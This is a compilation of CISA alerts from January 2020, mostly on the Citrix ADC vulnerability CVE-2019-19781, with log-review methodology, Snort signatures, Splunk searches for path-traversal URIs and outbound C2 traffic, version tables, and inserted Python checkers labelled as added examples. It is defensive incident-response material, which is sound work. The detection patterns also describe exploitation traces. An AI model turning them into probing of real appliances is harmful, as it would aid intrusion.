Analysts should focus on reviewing the following logs in /var/log on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the nobody user or (null) and should try to identify any suspicious commands that may have been run, such as whoami or curl. Keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.

bash.log

Sample Log Entry:

Jan 10 13:35:47 <local7.notice> ns bash[63394]: nobody on /dev/pts/3 shell_command="hostname"

Note: The bash log can provide the user (nobody), command (hostname), and process id (63394) related to the nefarious activity.

sh.log

notice.log

Check Crontab for Persistence

Context: Host Hunt

Type: Methodology

As with running processes and log entries, any cron jobs created by the user nobody are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for an httpd process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:

crontab -l -u nobody

Existence of Unusual Files

Context: Host Hunt

Type: Methodology

Open-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.

  • /netscaler/portal/templates
  • /var/tmp/netscaler/portal/templates

Snort Alerts

Context: Network Alert

Type: Signatures

Although most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye’s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .CONF response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"al]|0d0a|"; distance:0; content:"encrypt passwords"; distance:0; content:"name resolve order"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .PL response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"|0d0a|Connection: Keep-Alive"; content:"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e742e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f5343524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)

Suspicious Network Traffic

Context: Network Hunt

Type: Methodology

From a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing /../ or /vpns/ to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful POST request followed by a successful GET request with the aforementioned characteristics.

Given that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).

Inbound Exploitation Activity (Suspicious URIs)

index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml

Outbound Traffic Search (Backdoor C2)

index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>
| stats count by src dest dest_port
| sort -count
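The outbound-traffic search above, run offline over Zeek (Bro) conn.log records, as an added example that is not code from the CISA alert or the Zeek project. It keeps connections the appliance itself originated to non-internal responders and counts them by destination and port; the appliance address, the internal ranges and the sample records are constructed placeholders.

```python
"""Offline equivalent of the alert's Splunk outbound-traffic search over Zeek
conn.log lines. Added example; addresses and records are constructed."""
import ipaddress
from collections import Counter

CITRIX_IP = ipaddress.ip_address("10.10.10.5")  # placeholder appliance address
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Leading columns of a Zeek conn.log record (tab separated, in this order).
FIELDS = ("ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "proto")


def parse_conn(lines):
    """Yield one dict per conn.log record, skipping Zeek header lines."""
    for line in lines:
        if not line or line.startswith("#"):
            continue
        yield dict(zip(FIELDS, line.split("\t")))


def is_internal(ip, internal=INTERNAL_NETS):
    """True when the address (string or ip_address object) is in an internal range."""
    addr = ipaddress.ip_address(str(ip))
    return any(addr in net for net in internal)


def outbound_from_citrix(lines, citrix_ip=CITRIX_IP, internal=INTERNAL_NETS):
    """Count (src, dest, dest_port) for connections the appliance initiated to
    non-internal hosts, most frequent first: the same grouping as
    '| stats count by src dest dest_port | sort -count'. Internal destinations
    are excluded because an ADC legitimately talks to the web, file and
    application servers it load balances."""
    counts = Counter()
    for rec in parse_conn(lines):
        if ipaddress.ip_address(rec["id.orig_h"]) != citrix_ip:
            continue  # only connections the appliance originated
        if is_internal(rec["id.resp_h"], internal):
            continue
        counts[(rec["id.orig_h"], rec["id.resp_h"], int(rec["id.resp_p"]))] += 1
    return counts.most_common()


def conn(ts, uid, orig_h, orig_p, resp_h, resp_p, proto="tcp"):
    """Build one constructed conn.log line."""
    return "\t".join(str(v) for v in (ts, uid, orig_h, orig_p, resp_h, resp_p, proto))


# Constructed sample: normal inbound sessions to the appliance on 443,
# legitimate load-balancer traffic to an internal web server, and repeated
# outbound connections from the appliance to an external host on 443 plus
# one on 80, which is the anomalous direction the alert describes.
SAMPLE_CONN = [
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto",
    conn(1578662400.1, "CAaaaa1", "198.51.100.20", 51000, "10.10.10.5", 443),
    conn(1578662405.2, "CAaaaa2", "10.10.10.5", 40001, "10.2.2.2", 80),
    conn(1578662430.0, "CAaaaa3", "10.10.10.5", 40002, "203.0.113.10", 443),
    conn(1578662490.0, "CAaaaa4", "10.10.10.5", 40003, "203.0.113.10", 443),
    conn(1578662550.0, "CAaaaa5", "10.10.10.5", 40004, "203.0.113.10", 443),
    conn(1578662560.0, "CAaaaa6", "10.10.10.5", 40005, "198.51.100.9", 80),
    conn(1578662570.0, "CAaaaa7", "198.51.100.21", 51001, "10.10.10.5", 443),
]

if __name__ == "__main__":
    for (src, dest, port), count in outbound_from_citrix(SAMPLE_CONN):
        print(f"{count:4d}  {src} -> {dest}:{port}")
```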

The following resources provide additional detection measures.

  • Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[6] The tool aids customers with detecting potential IOCs based on known attacks and exploits.
  • The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[7]
  • CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[8]

Impact

CVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system.

The vulnerability affects the following appliances:

  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12
  • Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 11.1.63.15
  • Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 12.0.63.13
  • Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 12.1.55.18
  • Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 13.0.47.24
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Mitigations

The resources provided include steps for standalone, HA pairs, and clustered Citrix instances.

Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.

CISA's Tip Handling Destructive Malware provides additional information, including best practices and incident response strategies.

References

Revisions

  • January 31, 2020: Initial Version


National Cyber Awareness System:

01/31/2020 10:50 AM EST
Original release date: January 31, 2020

Adobe has released security updates to address vulnerabilities affecting Magento Commerce and Open Source editions. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletin APSB20-02 and apply the necessary updates.

 


National Cyber Awareness System:

01/29/2020 11:01 AM EST
Original release date: January 29, 2020

Tax Identity Theft Awareness Week is February 3-7. The Federal Trade Commission (FTC) Tax Identity Theft Awareness Week webpage will provide webinars and other resources from FTC and its partners throughout the week to help educate the public on how to protect against identity theft this tax season.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages taxpayers, businesses, and tax professionals to review the FTC announcement and the following resources for more information:


National Cyber Awareness System:

01/30/2020 11:14 AM EST
Original release date: January 30, 2020

Cisco has released security updates to address vulnerabilities affecting Cisco Small Business Switches. A remote attacker could exploit one of these vulnerabilities to obtain sensitive information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Cisco Security Advisories cisco-sa-smlbus-switch-dos-R6VquS2u and cisco-sa-20200129-smlbus-switch-disclos for more information.


National Cyber Awareness System:

01/28/2020 10:53 AM EST
Original release date: January 28, 2020

January 28 is Data Privacy Day, an annual effort to empower individuals and organizations to respect privacy, safeguard data, and enable trust. This year, the National Cyber Security Alliance (NCSA) is bringing together experts on U.S. and international privacy for A Vision for the Future, an in-depth discussion on new privacy laws and regulations. The NCSA Stay Safe Online website will live stream the January 28 event beginning at 1 p.m. ET. Presentation topics will include how to prepare for and implement recent legislation, such as the California Consumer Privacy Act and the European Union’s General Data Protection Regulation.
 
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review NCSA’s tips on updating privacy settings and the following CISA Tips.


National Cyber Awareness System:

01/28/2020 04:09 PM EST
Original release date: January 28, 2020

Apple has released security updates to address vulnerabilities in multiple products. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Apple security pages for the following products and apply the necessary updates:


National Cyber Awareness System:

01/20/2020 09:54 AM EST
Original release date: January 20, 2020 | Last revised: January 24, 2020

Summary

Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781.[1] 

On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0.
On January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances.
On January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0.
On January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.

A remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[2] This vulnerability has been detected in exploits in the wild.[3]

The Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.

Timeline of Specific Events

  • December 17, 2019 – Citrix released Security Bulletin CTX267027 with mitigation steps.
  • January 8, 2020 – The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[4] and CISA released a Current Activity entry.[5]
  • January 10, 2020 – The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[6]
  • January 11, 2020 – Citrix released blog post on CVE-2019-19781 with timeline for fixes.[7]
  • January 13, 2020 – CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[8] 
  • January 16, 2020 – Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.
  • January 19, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[9]
  • January 22, 2020 – Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.[10]
  • January 22, 2020 – Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[11]
  • January 23, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[12]
  • January 24, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5.

Technical Details

Impact

On December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.

The vulnerability affects the following appliances:

  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 11.1.63.15
  • Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 12.0.63.13
  • Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 12.1.55.18
  • Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 13.0.47.24
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Detection Measures

Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781 on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits.[13]

See the National Security Agency’s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[14]

CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[15] CISA encourages administrators to visit CISA’s GitHub page to download and run the tool.

Mitigations

CISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.

The fixed builds can be downloaded from Citrix Downloads pages for Citrix ADC, Citrix Gateway, and Citrix SD-WAN.

Until the appropriate update is implemented, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781.[16] Verify the successful application of the above mitigations by using the tool in CTX269180 – CVE-2019-19781 – Verification Tool. Note: these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[17]

Refer to table 1 for Citrix’s planned fix schedule.[18]

Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781

Vulnerable Appliance                         Firmware Update             Release Date
Citrix ADC and Citrix Gateway version 10.5   Refresh Build 10.5.70.12    January 24, 2020
Citrix ADC and Citrix Gateway version 11.1   Refresh Build 11.1.63.15    January 19, 2020
Citrix ADC and Citrix Gateway version 12.0   Refresh Build 12.0.63.13    January 19, 2020
Citrix ADC and Citrix Gateway version 12.1   Refresh Build 12.1.55.18    January 23, 2020
Citrix ADC and Citrix Gateway version 13.0   Refresh Build 13.0.47.24    January 23, 2020
Citrix SD-WAN WANOP Release 10.2.6           Build 10.2.6b               January 22, 2020
Citrix SD-WAN WANOP Release 11.0.3           Build 11.0.3b               January 22, 2020

Administrators should review NSA’s Citrix Advisory for other mitigations, such as applying the following defense-in-depth strategy:

“Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.”

References

Revisions

  • January 20, 2020: Initial Version
  • January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool
  • January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0


National Cyber Awareness System:

01/24/2020 09:47 AM EST
Original release date: January 24, 2020

The National Security Agency (NSA) has released an information sheet with guidance on mitigating cloud vulnerabilities. NSA identifies cloud security components and discusses threat actors, cloud vulnerabilities, and potential mitigation measures.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators and users to review NSA's guidance on Mitigating Cloud Vulnerabilities and CISA’s page on APTs Targeting IT Service Provider Customers and Analysis Report on Microsoft Office 365 and other Cloud Security Observations for information on implementing a defense-in-depth strategy to protect infrastructure assets.


National Cyber Awareness System:

01/23/2020 11:45 AM EST
Original release date: January 23, 2020

Cisco has released updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories page.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

 


National Cyber Awareness System:

01/23/2020 04:20 PM EST
Original release date: January 23, 2020

Citrix has released security updates to address the CVE-2019-19781 vulnerability in Citrix SD-WAN WANOP. An attacker could exploit this vulnerability to take control of an affected system. Citrix has also released an Indicators of Compromise Scanner that aims to identify evidence of successful exploitation of CVE-2019-19781.

The Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends users and administrators review the Citrix Security Bulletin CTX267027 and apply the necessary updates. CISA also recommends users and administrators:


National Cyber Awareness System:

01/24/2020 12:21 PM EST
Original release date: January 24, 2020

Cisco has released security updates to address a vulnerability affecting Cisco Webex Meetings Suite and Cisco Webex Meetings Online. A remote attacker could exploit this vulnerability to obtain sensitive information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Cisco Security Advisory cisco-sa-20200124-webex-unauthjoin for more information.


National Cyber Awareness System:

01/22/2020 10:57 AM EST
Original release date: January 22, 2020

The Internet Crime Complaint Center (IC3) has issued an alert warning consumers of fake jobs and hiring scams targeting applicants’ personally identifiable information (PII). Cyber criminals posing as legitimate employers spoof company websites and post fake job openings to lure victims. Cyber criminals will conduct fake interviews and even offer positions to victims before requesting PII such as Social Security numbers and bank account information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the IC3 Alert and CISA’s Tips on Avoiding Social Engineering and Phishing Attacks and Website Security for more information. If you believe you are a victim of cybercrime, file a complaint with IC3 at www.ic3.gov.


National Cyber Awareness System:

01/22/2020 06:04 PM EST
Original release date: January 22, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a recent increase in targeted Emotet malware attacks. Emotet is a sophisticated Trojan that commonly functions as a downloader or dropper of other malware. Emotet primarily spreads via malicious email attachments and attempts to proliferate within a network by brute forcing user credentials and writing to shared drives. If successful, an attacker could use an Emotet infection to obtain sensitive information. Such an attack could result in proprietary information and financial loss as well as disruption to operations and harm to reputation.

CISA recommends users and administrators adhere to the following best practices to defend against Emotet. See CISA’s Alert on Emotet Malware for detailed guidance.

  • Block email attachments commonly associated with malware (e.g., .dll and .exe).
  • Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).
  • Implement Group Policy Object and firewall rules.
  • Implement an antivirus program and a formalized patch management process.
  • Implement filters at the email gateway, and block suspicious IP addresses at the firewall.
  • Adhere to the principle of least privilege.
  • Implement a Domain-Based Message Authentication, Reporting & Conformance (DMARC) validation system.
  • Segment and segregate networks and functions. 
  • Limit unnecessary lateral communications.

CISA encourages users and administrators to review the following resources for information about defending against Emotet and other malware.


National Cyber Awareness System:

01/21/2020 11:11 AM EST
Original release date: January 21, 2020

The Samba Team has released security updates to address vulnerabilities in multiple versions of Samba. An attacker could exploit one of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Samba Security Announcements for CVE-2019-14902, CVE-2019-14907, and CVE-2019-19344 and apply the necessary updates and workarounds.

 


National Cyber Awareness System:

01/20/2020 1:15 PM EST
Original release date: January 20, 2020

Summary

On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0 to address CVE-2019-19781. Citrix expects to release updates for other vulnerable versions of Citrix ADC, Gateway, and SD-WAN WANOP appliances through January 24, 2020. (See Mitigations for update schedule).[1]

A remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[2] This vulnerability has been detected in exploits in the wild.[3]

The Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible once the appropriate firmware update becomes available.

Timeline of Specific Events

  • December 17, 2019 – Citrix releases Security Bulletin CTX267027 with mitigation steps.
  • January 8, 2020 – The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability, [4] and CISA releases a Current Activity entry.[5]
  • January 10, 2020 – The National Security Agency (NSA) releases a Cybersecurity Advisory on CVE-2019-19781.[6]
  • January 11, 2020 – Citrix releases blog post on CVE-2019-19781 with timeline for fixes.[7]
  • January 13, 2020 – CISA releases a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[8] 
  • January 16, 2020 – Citrix announces that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.
  • January 19, 2020 – Citrix releases firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[9]
  • January 24, 2020 – Citrix expects to release firmware updates for Citrix ADC and Citrix Gateway versions 10.5, 12.1, and 13.0 and Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.

Technical Details

Impact

On December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.

The vulnerability affects the following appliances:

  • Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds
  • Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 11.1.63.15
  • Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 12.0.63.13
  • Citrix ADC and NetScaler Gateway version 12.1 – all supported builds
  • Citrix ADC and Citrix Gateway version 13.0 – all supported builds
  • Citrix SD-WAN WANOP firmware and appliance models 4000, 4100, 5000, and 5100 – all supported builds. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Detection Measures

CISA has released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[10] CISA encourages administrators to visit CISA’s GitHub page to download and run the tool.

See the National Security Agency’s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[11]

Mitigations

CISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP once the appropriate firmware updates become available.

The fixed builds can be downloaded from Citrix Downloads pages for Citrix ADC and Citrix Gateway.

Until the appropriate update is accessible, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781.[12] Verify the successful application of the above mitigations by using the tool in CTX269180 – CVE-2019-19781 – Verification Tool. Note: these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[13]

Refer to table 1 for Citrix’s planned fix schedule.[14]

Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781

Vulnerable Appliance                        | Firmware Update                 | Release Date
Citrix ADC and Citrix Gateway version 10.5  | Refresh Build 10.5.70.x         | January 24, 2020 (Expected)
Citrix ADC and Citrix Gateway version 11.1  | Refresh Build 11.1.63.15        | January 19, 2020
Citrix ADC and Citrix Gateway version 12.0  | Refresh Build 12.0.63.13        | January 19, 2020
Citrix ADC and Citrix Gateway version 12.1  | Refresh Build 12.1.55.x         | January 24, 2020 (Expected)
Citrix ADC and Citrix Gateway version 13.0  | Refresh Build 13.0.47.x         | January 24, 2020 (Expected)
Citrix SD-WAN WANOP Release 10.2.6          | Citrix ADC Release 11.1.51.615  | January 24, 2020 (Expected)
Citrix SD-WAN WANOP Release 11.0.3          | Citrix ADC Release 11.1.51.615  | January 24, 2020 (Expected)
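As an added example (not CISA's or Citrix's code), the following Python check maps appliance version banners onto the affected-version list and fix schedule above. The banner format it parses ("NetScaler NSxx.x: Build yy.zz.nc") is an assumption about the appliance's "show ns version" output, the sample banners are constructed, and SD-WAN WANOP fix builds are not modeled:

```python
# Added example (not CISA's or Citrix's code): check Citrix ADC / Gateway build
# strings against the CVE-2019-19781 affected-version list and fix schedule quoted
# in this alert. The banner format "NetScaler NSxx.x: Build yy.zz.nc" is an
# assumption about the appliance's "show ns version" output; sample banners are
# constructed. Citrix SD-WAN WANOP fix builds are not modeled here.
import re

# release -> (fixed build within that release, fix released as of January 20, 2020)
# An "x" component means only the leading build number of the fix is announced.
FIX_SCHEDULE = {
    "10.5": ("70.x", False),   # expected January 24, 2020
    "11.1": ("63.15", True),   # released January 19, 2020
    "12.0": ("63.13", True),   # released January 19, 2020
    "12.1": ("55.x", False),   # expected January 24, 2020
    "13.0": ("47.x", False),   # expected January 24, 2020
}

BANNER_RE = re.compile(r"NetScaler NS(\d+\.\d+): Build (\d+\.\d+)")


def parse_banner(line):
    """Return (release, build) from a version banner, or None if it does not match."""
    m = BANNER_RE.search(line)
    return (m.group(1), m.group(2)) if m else None


def build_at_least(build, fixed):
    """Dotted-build comparison; an 'x' component in `fixed` matches any value."""
    have = [int(p) for p in build.split(".")]
    for i, part in enumerate(fixed.split(".")):
        if part == "x":
            return True
        mine = have[i] if i < len(have) else 0
        if mine != int(part):
            return mine > int(part)
    return True


def assess(release, build):
    """'fixed', 'vulnerable' (fix available), 'fix-pending', or 'not-listed'.

    'not-listed' only means the release is not in this alert's table; it is not
    a statement that the build is safe. Check the vendor bulletin for it.
    """
    if release not in FIX_SCHEDULE:
        return "not-listed"
    fixed, released = FIX_SCHEDULE[release]
    if build_at_least(build, fixed):
        return "fixed"
    return "vulnerable" if released else "fix-pending"


def assess_banner(line):
    """Classify one raw banner line; 'unparsed' when the format is not recognised."""
    parsed = parse_banner(line)
    return assess(*parsed) if parsed else "unparsed"


SAMPLE_BANNERS = [                      # constructed, not captured from real devices
    "NetScaler NS12.0: Build 62.10.nc",
    "NetScaler NS12.0: Build 63.13.nc",
    "NetScaler NS13.0: Build 41.28.nc",
    "NetScaler NS11.0: Build 70.16.nc",
]

if __name__ == "__main__":
    for line in SAMPLE_BANNERS:
        print(f"{line:40s} -> {assess_banner(line)}")
```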

 

Administrators should review NSA’s Citrix Advisory for other mitigations, such as applying the following defense-in-depth strategy:

“Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.”

References

Revisions

January 20, 2020: Initial Version


National Cyber Awareness System:

01/17/2020 10:52 AM EST
Original release date: January 17, 2020

Google has released Chrome version 79.0.3945.130 for Windows, Mac, and Linux. This version addresses vulnerabilities that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

 

 


National Cyber Awareness System:

01/17/2020 08:55 PM EST
Original release date: January 17, 2020

Microsoft has released a security advisory to address a critical vulnerability in Internet Explorer. A remote attacker could exploit this vulnerability to take control of an affected system. According to the advisory, “Microsoft is aware of limited targeted attacks.”

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s Advisory ADV20001 and CERT/CC's Vulnerability Note VU#338824 for more information, implement workarounds, and apply updates when available. Consider using Microsoft Edge or an alternate browser until patches are made available.


National Cyber Awareness System:

01/17/2020 09:34 PM EST
Original release date: January 17, 2020

Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. Citrix plans to begin releasing security updates for affected software starting January 20, 2020.

The Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:


National Cyber Awareness System:

01/14/2020 05:01 PM EST
Original release date: January 14, 2020

Oracle has released its Critical Patch Update for January 2020 containing 334 new security patches to address vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Oracle January 2020 Critical Patch Update and apply the necessary updates.


National Cyber Awareness System:

01/14/2020 04:57 PM EST
Original release date: January 14, 2020

Adobe has released security updates to address vulnerabilities in Illustrator CC and Experience Manager. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletins APSB20-03 and APSB20-01 and apply the necessary updates.


National Cyber Awareness System:

01/14/2020 04:53 PM EST
Original release date: January 14, 2020

VMware has released a security update to address a vulnerability in VMware Tools. An attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2020-0002 and apply the necessary update.


National Cyber Awareness System:

01/14/2020 03:41 PM EST
Original release date: January 14, 2020

Intel has released security updates to address vulnerabilities in multiple products. An authenticated attacker with local access could exploit some of these vulnerabilities to gain escalation of privileges.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Intel advisories and apply the necessary updates:


National Cyber Awareness System:

01/14/2020 03:32 PM EST
Original release date: January 14, 2020

Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

